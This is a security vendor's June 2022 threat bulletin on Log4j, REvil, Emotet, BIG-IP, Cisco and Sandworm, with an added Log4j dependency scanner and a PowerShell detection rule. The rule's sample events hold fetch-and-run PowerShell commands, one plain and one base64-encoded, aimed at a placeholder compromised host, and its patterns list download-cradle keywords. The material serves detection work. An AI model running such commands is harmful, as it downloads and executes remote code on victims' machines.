Threat Intel Roundup

Published: 01 June 2022

Content

01. Summary
02. Threat Spotlight
  • REvil REturns with new data-leak site
03. Quick News Bites
  • New Emotet campaign attributed to TA542
  • Threat actors hide malware in plain sight in Windows event logs
  • Attackers exploit critical BIG-IP vulnerability
  • Cisco zero-day vulnerability exploited, patched
  • Threat hunters are hunted with fake PoC, Cobalt Strike
  • Sandworm attacks Ukrainian energy sector
04. Closing Summary

A Note From The Cyber Threat Response Team

Integrity360 dealt with a blast from the (not so distant) past in May, starting the month by assisting a client who had fallen prey to the Log4j vulnerability (Log4Shell, CVE-2021-44228), which is notorious for how trivially it can be exploited. Although the vulnerability was disclosed in November 2021, we are still seeing unknowingly vulnerable clients six months later. It is a well-known trend in cyber security that defences lag one step behind attackers, especially where zero-day vulnerabilities are concerned. In the case of Log4j, it is still widely exploited simply because the library is incorporated into an extremely large number of applications, either directly or through third-party libraries. The client in question was unaware that a product they were using relied on Log4j at all, because the product pulled it in indirectly via a third-party plug-in. One of the many defences against this kind of wide-spread vulnerability is to establish meticulously which third-party libraries your ICT products contain, including libraries nested inside other components. This is difficult given that most vendors do not publish such inventories, but asking vendors for a software bill of materials (SBOM) and scanning your own installations for the affected components is worth the effort for when the next Log4j comes around.
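
The discovery problem described above, as an added example (this is not Integrity360's tooling or code from the original bulletin): a small Python scanner that opens an archive, recurses into any jar/war/ear/zip nested inside it, and reports every log4j-core copy it finds together with its version and whether the `JndiLookup` class is still present. The two marker paths are the Log4j project's real ones; the flagging threshold, the in-memory `product.jar` / `vendor-plugin.jar` sample and the placeholder class bytes are constructed for illustration.

```python
import io
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Marker entries inside a log4j-core jar. The paths follow the Log4j project's own layout.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    location: str             # outer.jar!plugin.jar!log4j-core.jar, so the nesting is visible
    version: Optional[str]    # from pom.properties, or None if the jar was repackaged without it
    jndi_lookup_present: bool

    @property
    def flagged(self) -> bool:
        """Triage heuristic (an assumption of this example): a 2.x log4j-core below 2.15.0 that
        still ships JndiLookup needs review. The 2.12.2 and 2.3.1 backports also fixed
        CVE-2021-44228 while keeping the class, so confirm the version before escalating."""
        if not self.jndi_lookup_present:
            return False
        if self.version is None:
            return True                      # JNDI lookup class but no version: review it
        return (2,) <= parse_version(self.version) < (2, 15)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Non-numeric tails are dropped."""
    parts: List[int] = []
    for piece in text.split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def _scan(data: bytes, location: str, findings: List[Finding]) -> None:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return                               # not a zip container; nothing to recurse into
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi = JNDI_CLASS in names
        if version is not None or jndi:
            findings.append(Finding(location, version, jndi))
        # Recurse into nested archives: this is where a plug-in's private copy of Log4j hides.
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXTS):
                _scan(zf.read(name), f"{location}!{name}", findings)


def scan_bytes(data: bytes, location: str) -> List[Finding]:
    """Scan one archive (given as bytes) and everything nested inside it."""
    findings: List[Finding] = []
    _scan(data, location, findings)
    return findings


def build_log4j_core_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar: marker entries only, no real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                              f"artifactId=log4j-core\n")
        if include_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buf.getvalue()


def build_sample_product() -> bytes:
    """Constructed product.jar that bundles a vendor plug-in, which bundles log4j-core 2.14.1."""
    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "w") as z:
        z.writestr("lib/log4j-core-2.14.1.jar", build_log4j_core_jar("2.14.1", True))
    product = io.BytesIO()
    with zipfile.ZipFile(product, "w") as z:
        z.writestr("plugins/vendor-plugin.jar", plugin.getvalue())
        z.writestr("README.txt", "constructed sample, not a real product\n")
    return product.getvalue()


if __name__ == "__main__":
    for f in scan_bytes(build_sample_product(), "product.jar"):
        print(f"{f.location}: log4j-core {f.version or '?'} "
              f"JndiLookup={f.jndi_lookup_present} flagged={f.flagged}")
```

Point `scan_bytes` at the archives under a product's installation directory (an `os.walk` over `*.jar`, `*.war`, `*.ear` and `*.zip` files is the natural wrapper) and compare the reported versions with the vendor's advisories; a hit inside a plug-in's `lib/` directory is exactly the nested dependency the vendor may never have listed.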

One thing we have noticed about the most recent ransomware attacks is that attackers are no longer so interested in encrypting users' PCs and laptops. Their main goal is to gain access to the client's hypervisor (such as VMware ESXi) and encrypt the virtual machines and datastores themselves, rather than the operating systems inside them. This is far more disruptive, and most hypervisors run proprietary operating systems on which conventional endpoint anti-virus agents cannot be installed, so prevention depends on hardening the management plane instead: patching the hypervisor promptly, disabling SSH and the ESXi Shell when they are not needed, enabling lockdown mode, and keeping vCenter and host management interfaces off networks that a compromised user endpoint can reach.

Threat Spotlight

REvil REturns with new data-leak site

New information suggests that the notorious REvil ransomware operation has resumed activity, following its takedown in January 2022 that led to the arrest of 14 of its members. In late April 2022, REvil's Tor (The Onion Router) infrastructure became active again, redirecting visitors to a data-leak website belonging to an unnamed extortion group. Victims from nearly every geography and sector, including many entities previously listed on REvil's old data-leak website "Happy Blog", were named on the new site. The presence of new victims indicates that the group behind the operation is likely active. At the time of writing, the data-leak website displays details of the recruitment process for this new ransomware operation, so the threat actors likely intend to run a ransomware-as-a-service (RaaS) programme. Affiliates who join will reportedly receive an improved version of the REvil ransomware and an 80/20 split of ransom payments in the affiliate's favour. According to the website's operators, the group will use the escrow system of the Russian-language cybercriminal forum RuTOR for communication between operators and affiliates. Although attribution is unconfirmed, multiple factors indicate that this unnamed cyber extortion group (CEG) is likely linked to REvil: besides the infrastructure and victim overlaps, a newly discovered ransomware sample used by the group was highly likely compiled directly from REvil's source code, and cybercriminal forum discussions have hinted that REvil members are behind the new operation.

Quick News Bites

New Emotet campaign attributed to TA542

The threat group "TA542" launched a new "Emotet" phishing campaign that distributed password-protected ZIP archives containing Windows shortcut (.LNK) files disguised as Word documents. When a victim double-clicked the shortcut, it executed a malicious PowerShell command that downloaded the Emotet payload from a list of previously compromised websites. Because no Office macro is involved, this shift can bypass security controls tuned to macro-laden documents, leaving organisations at a higher risk of a follow-on ransomware attack.

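The process chain described above (explorer.exe launching a hidden PowerShell that fetches a payload from a compromised site) is what a detection rule should key on. The following is an added example, not code from the original bulletin or from the researchers who reported the campaign: a scoring rule run over constructed Sysmon Event ID 1 style process-creation records. The field names, command lines and the domain `compromised.example` are constructed for illustration; the rule also decodes `-EncodedCommand` arguments so that a cradle hidden behind base64 is still seen.

```python
import base64
import re
from typing import Dict, List, Optional

# Command-line patterns. Case-insensitive because PowerShell accepts any casing and abbreviations.
_POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
_BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)
_ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)   # -e / -enc / -EncodedCommand
_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
_URL = re.compile(r"https?://", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = _ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; 3 or more points marks it suspicious."""
    result: Dict[str, object] = {"score": 0, "reasons": [], "suspicious": False, "decoded": None}
    if not _POWERSHELL.search(event.get("Image", "")):
        return result
    cmdline = event.get("CommandLine", "")
    reasons: List[str] = []
    if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("spawned directly by explorer.exe (what a double-clicked .LNK looks like)")
    if _HIDDEN.search(cmdline):
        reasons.append("hidden window requested")
    if _BYPASS.search(cmdline):
        reasons.append("execution policy bypass or profile suppression")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("base64-encoded command (decoded for inspection)")
    effective = cmdline + "\n" + (decoded or "")      # inspect the decoded text too
    score = len(reasons)
    if _CRADLE.search(effective) and _URL.search(effective):
        reasons.append("download cradle fetching a remote URL")
        score += 2                                   # the cradle is the strongest single signal
    result.update(score=score, reasons=reasons, suspicious=score >= 3, decoded=decoded)
    return result


# Constructed sample records in Sysmon Event ID 1 style (not real telemetry).
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://compromised.example/a.ps1')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # .LNK disguised as a Word document, opened by the user
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -nop -ep bypass -c "iwr http://compromised.example/wp-content/x.dll -OutFile $env:TEMP\x.dll; regsvr32 /s $env:TEMP\x.dll"',
    },
    {   # same chain, but the cradle is hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC_PAYLOAD,
    },
    {   # scheduled maintenance script: no cradle, no hiding
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    },
    {   # user opened an interactive console from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
]


def suspicious_events(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of the records that trip the rule."""
    return [i for i, e in enumerate(events) if analyse(e)["suspicious"]]


if __name__ == "__main__":
    for i in suspicious_events(SAMPLE_EVENTS):
        print(i, analyse(SAMPLE_EVENTS[i])["reasons"])
```

The scoring deliberately does not fire on explorer.exe spawning PowerShell alone, since users legitimately open consoles, nor on a scheduled script that merely uses `-NoProfile`; it needs the combination of concealment flags and a remote fetch. In production the same logic belongs in the SIEM as a correlation rule over the process-creation source, with `cmd.exe` and `wscript.exe` as intermediate parents added, because LNK payloads do not always call PowerShell directly.
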
Threat actors hide malware in plain sight in Windows event logs

Cyber-security researchers reported on a new campaign, tracked as "SilentBreak", that has been active since at least September 2021. SilentBreak involved the novel technique of storing shellcode payloads inside Windows event log records via a customised malware dropper; a launcher later reads the stored chunks back, reassembles them in memory and executes the payload. Doing so let the attackers keep the payload off disk (fileless) and away from file-based scanning. Because event logs are not normally inspected for executable content, detection has to rest on the dropper and launcher behaviour, such as unusual processes writing to and reading from the event log, rather than on the stored payload itself. The use of sophisticated techniques and tools indicates that a state-associated threat actor or group is likely responsible for this campaign.

Attackers exploit critical BIG-IP vulnerability

Since F5 disclosed a critical vulnerability affecting its BIG-IP devices on 04 May 2022, there have been several reports of attackers attempting to exploit it. The vulnerability, tracked as CVE-2022-1388, is an authentication bypass in the iControl REST management interface that allows an unauthenticated attacker to execute arbitrary commands on BIG-IP devices. Although most attempts have sought to gain initial access to vulnerable devices, cyber-security researchers observed two instances in which attackers sought to erase files. As the vulnerability grants root privileges, it is realistically possible for these actors to delete the configuration files the BIG-IP device needs to operate, turning an intrusion into an outage. Users are urged to apply patches as soon as possible and, in the meantime, to make sure the management interface and self IPs do not expose iControl REST to untrusted networks, which F5 listed as an interim mitigation.

Cisco zero-day vulnerability exploited, patched

On 20 May 2022, Cisco announced that it had patched an actively exploited zero-day vulnerability, CVE-2022-20821, in its IOS XR software. The flaw allows an unauthenticated remote attacker to reach a Redis instance (an in-memory database) running inside the NOSi Docker container, because the health check RPM opens TCP port 6379, Redis's default port, when it is activated. Attackers can write to and read from the Redis database, although the flaw does not allow remote code execution. Users running IOS XR 7.3.3 with the health check RPM installed and active should update immediately; until then, disabling the health check RPM removes the exposed service.

Threat hunters are hunted with fake PoC, Cobalt Strike

On 23 May 2022, researchers reported on a new campaign that targeted cyber-security researchers with a Cobalt Strike beacon (Cobalt Strike is a commercial adversary-simulation framework, not an exploit kit, and its beacon is widely abused as a command-and-control implant). The attackers lured researchers with a fake proof of concept (PoC) for two recently patched remote-code-execution vulnerabilities in Microsoft Windows, CVE-2022-24500 and CVE-2022-26809; running the supposed PoC infected the researcher's own machine. The campaign has not been attributed to a specific threat actor or group, but targeting cyber-security researchers is a technique previously used by the North Korea-linked "Lazarus Group". Security researchers often hold zero-day exploits and sensitive information, making them attractive targets for a range of threat actors; unverified PoC code should only ever be run in an isolated, disposable environment.

Sandworm attacks Ukrainian energy sector

On 20 May 2022, cyber-security researchers observed the Russia-linked "Sandworm" APT group targeting a Ukrainian energy provider with the new "ArguePatch" loader malware. The group used the "CaddyWiper" destructive wiper to obfuscate traces of "Industroyer2", malware built to interact with industrial control systems and deployed against Ukrainian critical infrastructure. In December 2016 Sandworm cut power in Ukraine using the original Industroyer (also known as CrashOverride), of which Industroyer2 is a direct successor.

Closing Summary

Integrity360 hosted its second security conference of 2022, "Security First", in Dublin in May. The conference was a great success, with very informative discussions and presentations, including one from Sir Alex Younger, the former Chief of the British Secret Intelligence Service (MI6), who gave a very interesting talk on how intelligence ties into cyber security.

If you are worried about any of the threats outlined in this bulletin, or need help determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitment consultation. Also feel free to explore the many cyber security resources available on our website.

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services, such as Managed SIEM and Managed Detection and Response (MDR).

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
